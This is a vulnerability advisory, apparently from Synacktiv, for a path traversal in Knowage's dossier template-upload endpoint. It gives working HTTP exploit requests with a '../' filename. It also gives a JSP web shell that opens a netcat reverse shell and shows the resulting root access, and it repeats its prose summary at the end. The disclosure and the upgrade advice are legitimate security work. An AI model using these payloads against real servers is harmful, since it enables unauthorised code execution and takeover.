The /knowage/restful-services/dossier/importTemplateFile endpoint allows authenticated users to upload "templates" on the server, but does not need any authorization to be reached.
Also, this endpoint does not check the type of the file that is uploaded by the user, and does not properly handle the filename provided. In fact, the filename is directly appended to the location of where the file will be written, allowing an attacker to perform a path traversal attack and place his file anywhere on the file system.
// knowage-core/src/main/java/it/eng/spagobi/api/DossierActivityResource.java
public Response importTemplateFile(MultiPartBody multipartFormDataInput) throws JSONException {
byte[] archiveBytes = null;
JSONObject response = new JSONObject();
try {
String separator = File.separator;
final FormFile file = multipartFormDataInput.getFormFileParameterValues("file")[0];
String fileName = file.getFileName();
archiveBytes = file.getContent();
// [...]
File f = new File(SpagoBIUtilities.getResourcePath() + separator + "dossier" + separator + fileName);
FileOutputStream outputStream = new FileOutputStream(f);
outputStream.write(archiveBytes);
outputStream.close();By performing the following HTTP request against the application, a file called poc will be written into the /tmp directory of the underlying server.
POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
Host: 127.0.0.1:8088
Cookie: JSESSIONID=C21D8A4676D617862E020548CC3C7518; kn.lang=en-US
Content-Length: 211
Content-Type: multipart/form-data; boundary=d7fe18eaf5c6958f3e8723a6ca89c392
--d7fe18eaf5c6958f3e8723a6ca89c392
Content-Disposition: form-data; name="file"; filename="../../../../../../../../tmp/poc"
Content-Type: image/png
synacktiv was here.
--d7fe18eaf5c6958f3e8723a6ca89c392--
HTTP/1.1 200
Date: Mon, 27 Jun 2022 17:56:34 GMT
[...]
{"STATUS":"OK"}
root@1f7ab7904524: /# cat /tmp/poc
synacktiv was here.
Impact
By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the knowageqbeengine directory and gain code execution capability on the server.
POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
[...]
--d7fe18eaf5c6958f3e8723a6ca89c392
Content-Disposition: form-data; name="file"; filename="../../../../../../../../home/knowage/apache-tomcat/webapps/knowageqbeengine/foo.jsp"
Content-Type: image/png
<%@ page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%Runtime.getRuntime().exec("nc -c sh 127.0.0.1 1337");%>
--d7fe18eaf5c6958f3e8723a6ca89c392--
HTTP/1.1 200
[...]
{"STATUS":"OK"}
When the JSP file is uploaded, the attacker just needs to connect to /knowageqbeengine/foo.jsp to gain code execution on the server.
$ curl http://127.0.0.1:8088/knowageqbeengine/foo.jsp
[...]
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56678
id
uid=0(root) gid=0(root) groups=0(root)
Patches
You need to upgrade to Knowage 8.1.8 or a later version.
florents-syn Analyst
The /knowage/restful-services/dossier/importTemplateFile endpoint allows authenticated users to upload "templates" on the server, but does not need any authorization to be reached.
Also, this endpoint does not check the type of the file that is uploaded by the user, and does not properly handle the filename provided. In fact, the filename is directly appended to the location of where the file will be written, allowing an attacker to perform a path traversal attack and place his file anywhere on the file system.
By performing the following HTTP request against the application, a file called poc will be written into the /tmp directory of the underlying server.
Impact
By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the knowageqbeengine directory and gain code execution capability on the server.
When the JSP file is uploaded, the attacker just needs to connect to /knowageqbeengine/foo.jsp to gain code execution on the server.
Patches
You need to upgrade to Knowage 8.1.8 or a later version.